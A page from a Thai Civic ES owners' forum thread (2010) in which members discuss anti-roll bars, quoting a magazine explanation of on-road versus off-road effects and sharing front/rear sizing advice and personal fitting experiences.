เหล็กกันโคลง มีหน้าที่หลักคือ ด้านการยกของล้อในขณะขับรถเข้าโค้งด้วยความเร็วสูงจะสังเกตได้ว่า รถที่ไม่ได้ติดเหล็กกันโคลงเมื่อขับเข้าโค้งด้วยความเร็วสูง ล้อด้านที่อยู่ด้านในของวงเลี้ยว จะมีอาการโยนตัวอย่างุรนแรง อาจทำให้ล้อยกลอยตัวสูงจากพื้น ทำให้ประสิทธิภาพการยึดเกาะถนนเสียไป นั่นหมายความว่า เมื่อรถเข้าโค้ง แทนที่หน้าสัมผัสของยางทั้ง 4 เส้นจะสัมผัสพื้นถนนเหมือนกันหมด ก็สัมผัสพื้นถนนเพียง 3 เส้นเท่านั้น
แต่ถ้าได้รับการติดตั้งเหล็กกันโคลงแล้ว ล้อด้านในโค้งจะถูกแรงต้านจากเหล็กกันโคลงไม่ให้ล้อเกิดการลอยตัว โดยเหล็กกันโคลงจะได้รับแรงกดจากล้ออีกข้าง จึงทำให้เมื่อต้องขับรถเข้าโค้งด้วยความเร็วสูง หน้าสัมผัสของยางทั้ง 4 เส้นก็ยังคงสัมผัสพื้นผิวถนนได้อย่างเต็มที่
นั่นเป็นข้อดีของเหล็กกันโคลงสำหรับรถวิ่งทางเรียบหรือออนโรด แต่สำหรับทางทุรกันดารของรถโฟร์วีลดไดร์ฟแล้ว เหล็กกันโคลงกลับเป็นสิ่งที่ไม่ต้องการ เนื่องจากรถขับเคลื่อน 4 ล้อต้องการให้ล้อทั้ง 4 มีความอิสระต่อการเคลื่อนที่ให้มากที่สุด อย่างเช่น เมือต้องขับให้ล้อหน้าด้านใดด้านหนึ่งปีนโขดหินแล้ว ล้อด้านที่ไม่ได้ปีนโขดหินก็ต้องสัมผัสพื้นผิวถนน เพื่อต้องการการขับเคลื่อนอยู่ แต่ถ้าคุณติดตั้งเหล็กกันโคลงเข้ากับรถ แทนที่ล้อด้านที่ไม่ได้ปีนโขดหินจะสัมผัสพื้นผิวถนน กลับต้องลอยเคว้งอยุ่กลางอากาศ เนื่องจากแรงต้านของเหล็กกันโคลงที่คอยรั้งให้ล้ออีกด้านลอยขึ้นจากพื้นดิน ตาม ในกรณีนี้ถือว่าทำให้ประสิทธิภาพในการขับเคลื่นอในทางทุรกันดารเสียไป
จึงพอสรุปได้ว่า เหล็กกันโคลงนั้น เหมาะสำหรับรถวิ่งทางเรียบ แต่สำหรับเส้นทางทุรกันดารของรถโฟร์วีลไดร์ฟแล้ว เหล็กกันโคลงไม่ใช่เรื่องจำเป็นเลย สำหรับรถโฟร์วีลหรูหราบางรุ่น ได้ทำกลไกให้มีการปลดล็อคเหล็กกันโคลงออกได้เมื่อเข้าเส้นทางทุรกันดาร และสามารถต่อกลไกเหล็กกันโคลงได้เมื่อกลับมาวิ่งบนทางเรียบครับ....


อ้างอิงจานิตยสาร4Wheels


อันนี้ข้อคิดเห็นของท่านปะทานฝากมา

ES21_fatboy พิมพ์ว่า:
ขออนุญาตฝากพี่ๆเพื่อนๆชาว ES ไว้นิสนุง นะคับ สำหรับเรื่องเหล็กกันโคลง ว่า...

สำหรับรถขับเคลื่อนล้อหน้า แบบ ES ของชาวเรานี้ มีหลักการพิจารณาง่ายๆแบบนี้คับ


การใช้งานเหล็กกันโคลงที่เหมาะสม

- ไม่ใส่เหล็กกันโคลงเลย ทั้งด้านหน้า และ ด้านหลัง

- ใส่เหล็กกันโคลงเฉพาะด้านหน้า

- ใส่เหล็กกันโคลง ทั้ง ด้านหน้า และ ด้านหลัง

โดยมีขนาดเหล็กกันโคลงด้านหน้า ใหญ่กว่า เหล็กกันโคลงด้านหลัง


การใช้งานเหล็กกันโคลงที่ไม่เหมาะสม

- ใส่เหล็กกันโคลงเฉพาะด้านหลัง แต่ด้านหน้าไม่ใส่เหล็กกันโคลง

- ใส่เหล็กกันโคลง ทั้ง ด้านหน้า และ ด้านหลัง

โดยมีขนาดเหล็กกันโคลงด้านหลัง ใหญ่กว่า เหล็กกันโคลงด้านหน้า



เดี๋ยวมาดูรูปกัน


เจ๋งมาก น้อง...
ได้รับคำขอบคุณจาก: john  TUNG11 
kantaphat


ชื่อเล่น: ก๊อต

เข้าร่วม: 08 เมษา 2010
ตอบ: 1411

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 822
ให้คำขอบคุณ: 2374

ที่อยู่: เมือง โคราช
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 3 ตุลา 2010 23:10 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
โอ้ว..ความรู้ทั้งนั้น
นี่ล่ะที่ต้องการ..
ได้รับคำขอบคุณจาก: hacker  john 
hacker


ชื่อเล่น: เซียนจ๊อบ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 4046

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 10965
ให้คำขอบคุณ: 22797

ที่อยู่: BKK <--> CNX
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 4 ตุลา 2010 11:11 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
จะแขวะอะไรก็แขวะมาได้ครับ ไม่ต้อง PM มาแขวะก็ได้ ผมสบายๆอยู่แล้ว ว่ากันไปตรงๆ

ก้อเหมือนอย่างที่มีคนเคยตอบว่า ไม่ต้อง PM มา ผมไม่อ่าน PM
แต่ผมอ่าน PM ทุก PM ตอบทุกๆคำถาม ความรู้ที่ผมได้ลองผิดลองถูกมา ผมก็ตอบไปตามนั้น

ผมมั่นใจว่าในทุกๆกระทู้ของผมถึงมันจะไร้สาระไปบ้าง แต่ข้อมูลที่ผมพยายามจะลงให้เพื่อนๆสมาชิก
ไม่ว่าจะเป็นเรื่องเบาะ เรื่องโช้ค เรื่องกันโคลง ผมไม่มีส่วนได้ส่วนเสียหรือผลประโยชน์อะไรเลย
แล้วผมก็รับโทรศัพท์เพื่อนๆทุกคนที่โทรมาสอบถามข้อมูลตลอด ไม่มีบ่ายเบี่ยง นอกจากผมเมา
บ่อยครั้งที่ผมไปแขวะกับร้านค้าของบางคนที่ขายของแพง ขายของเว่อร์ โฆษณา เกินจริง ผมก็จะตรงๆไป เพื่อนๆหลายๆคนก็จะเห็น

อันวิชาความรู้ที่มีมานั้น มันจะไม่เกิดประโยชน์อะไรเลย ถ้าเราไม่ถ่ายทอดไปให้ผู้ที่ไม่รู้ได้รับไป > อันนี้ความเห็นผม
แต่บางคน
มีวิชาความรู้มาก แต่ครั้นจะถ่ายทอดให้คนอื่นไป ก็กลัวจะเสียผลประโยชน์ > อันนี้ของใครไม่รู้


edit คำผิด


แก้ไขล่าสุดโดย เมื่อ จันทร์, 4 ตุลา 2010 23:26, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: 8800Gold  tokykung  max_x  urawin  jonatan  tatumz  kittidech  numnoi03  benzd  battery3k  Oad  PAE KUNG  Pete Villian  honeybeex7  john  Phetcharat  moonoy  koobe  TUNG11  nismo 
koobe


ชื่อเล่น: นัท

เข้าร่วม: 19 มิถุนา 2010
ตอบ: 2462

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3437
ให้คำขอบคุณ: 2482

ที่อยู่: เพชรบุรี-กระทุ่มแบน-คลองเตย-ลาดกระบัง
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 4 ตุลา 2010 20:58 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
เห็นแล้วอยาก (เสื...)บ้างครับเรื่องเหล็กกันโคลงผมนี่แหละลองกับรถจริงมาเลย EXI 03 จะใส่หน้าหลังเลย ก่อนติดตั้งก็ได้ศึกษาจากในนี้แหละครับ โทรไปคุยกับคุณแซม(ของเมกา)ดีทุกอย่างใหญ่ๆไว้ก่อน เฮ้อ พอดีเงินไม่ถึงเกือบหมื่น(หลังอย่างเดียวด้วย) เลย PM ไปหาคุณจ๊อบ (พี่แกเล่นส่งเมลมา3-4 หน้ากระดาษอธิบายซะอย่างกับมานั่งทำให้ดูเองเลย(แจ๋วจิง)สรุปทิ้งท้ายคุณจ๊อบบอกว่าถ้าพี่จะใส่ลองเอาแค่ขนาดที่ศูนย์ใส่มาให้ก็พอนะพี่ ลองดูก่อน ประหยัดเงินดี เช้ามา จัดของเลย(ให้คุณบอยบอย และพี่ใหม่พรเทพ จัดให้ หมดไปเบ็ดเสร็จหน้าหลัง เกือบหกพัน)ใส่เสร็จลองรถวิ่งสายบางนา ตราด เลย (ขับไปนึกถึงคำพูดคุณจ๊อบเลยเป็นแบบที่พี่แกว่ามาทุกอย่าง) กลับมาถอดข้างหลังออกเลยครับขนาด 13.4mm ยังแข็งขนาดนี้แล้วถ้าของ พี่แซมยังกะไม้คานจะขนาดไหน ถ้าราคาแค่พันสองพันก็คงรับได้มั้ง นี่ แปดพันยังไม่รวมค่าทำ คงอ่วมหละมั้ง อะฮ่า ๆๆ ผมก็ไม่มีส่วนได้เสียกับใครนะครับแค่อยากมา (เสื..)ให้ฟัง ทุกวันนี้ยังนึกขอบคุณจ๊อบอยู่เลยที่ไม่ยุให้ใส่ใหญ่ๆไว้ก่อน กิ้ว กิ้ว
ได้รับคำขอบคุณจาก: hacker  benzd  8800Gold  honeybeex7  zan  nismo 
jonatan


ชื่อเล่น: โจ

เข้าร่วม: 02 ตุลา 2008
ตอบ: 6291

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 19304
ให้คำขอบคุณ: 13458

ที่อยู่: ประชาอุทิศ - สุขสวัสดิ์ - สีลม
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 4 ตุลา 2010 21:50 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
สรุปผมจะใส่ของเดิมๆ ที่จะได้ฟรีมานี่ก็ โอ อ่ะจิ
ได้รับคำขอบคุณจาก: hacker  benzd  john 
k-autosociety


ชื่อเล่น: เค

เข้าร่วม: 16 มิถุนา 2009
ตอบ: 1658

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2144
ให้คำขอบคุณ: 3374

ที่อยู่: uttaradit - kasetnavamin
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 4 ตุลา 2010 22:21 - *~ แชร์ประสบการณ์ เหล็กกันโคลง
ขอบคุณครับ
ได้รับคำขอบคุณจาก: hacker  john 
ตอบ
หน้า 4 จาก 8
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.